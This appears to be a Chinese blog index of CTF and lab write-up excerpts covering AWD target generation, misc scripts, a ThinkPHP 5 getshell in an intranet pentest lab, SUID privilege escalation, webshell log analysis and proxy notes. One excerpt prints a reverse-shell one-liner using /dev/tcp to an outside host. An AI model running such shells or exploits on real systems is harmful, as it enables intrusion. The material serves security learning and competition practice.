文章演示版本：V4.0.0最新版本：V4.0.0最后更新日期：2025/07/01 目标生成 使用场景：在目标扫描前如果没有下发靶机地址列表，则需要自己生成一份去扫描 ip段生成 使用场景：裁判给了一个C段（192.168.10.0），所有队伍的靶机都在这个C段中，具体ip需要自己发现生成文件：ip.txt 输入192.168.10.*又或者是10.10.*.1(用*占位

misc吾的字节_1二维码图片等距提取像素点并将黑白转成10 123456789101112131415161718192021222324252627282930313233343536from PIL import Imagea = Image.open("five.png")x_, y_ = 0, 0w, h = a.sizeb = Image.new(a.mode, (

开始签到白嫖打完所有靶机计划! Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。 前置知识: 内网渗透学习(代理篇)内网渗透学习(横向移动篇)linux提权笔记 入口（172.22.1.15）根据报错信息得知是ThinkPHP 5，存在nday，可以getshell 写马后查看用户是 www-data

记录在比赛和靶场中遇到的提权方法 推荐本地部署一个GTFOBins用来查询 suid 提权 SUID是一种特殊权限，可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件，那么就可以在运行该文件的时候获得root用户权限 查找当前系统上文件属主为 root 并且拥有 SUID 权限的可执行文件 1234find / -user root -per

dseasydatalog分析error.log发现首先上传了木马，然后用蚁剑进行连接 全局搜索发现包含一个zip和jpg 压缩包数据很少直接手动提取出来，图片数据太多用脚本提取出来 12345678910111213141516171819202122232425262728293031323334353637383940414243444546import redef extract_jpg

第一次打RHG模式，i春秋的平台和在网上看到的不太一样，一轮是一小时，也可以手动一题一题做然后提交 写了个脚本获取题目信息然后下载，运行写好的exp然后提交flag（写不来自动分析漏洞，就人工代替ai） 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253

总榜Rank1，在毕业前拿到榜一也是圆满了 :) webwucanrce123456789101112131415161718<?phpecho "get只接受code欧,flag在上一级目录<br>";$filename = __FILE__;highlight_file($filename);if(isset($_GET['code']

签到网安知识大挑战数据存储在js中 aes解密得到flag 签到题1Base92 -> Base85 -> Base64 -> Base62 -> Base58 -> Base45 -> Base32 DASCTF{welcome_to_zjctf_2024} webhack memory访问/robot.txt得到/upload路径

本文中使用的代理工具可通过我的脚本一键下载https://github.com/dr0n1/CTF_misc_auto_deploy 反弹shell推荐在本地部署一个reverse-shell-generator，可以很方便的查看命令 以下是几个常用的 bash -i1/bin/sh -i >& /dev/tcp/1.1.1.1/8888 0>&1 nc1234567

[初赛] 数据安全data-analy1恢复被打乱的数据 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import csvimport reimport pandas as pddata = pd.read_csv("person_data.csv",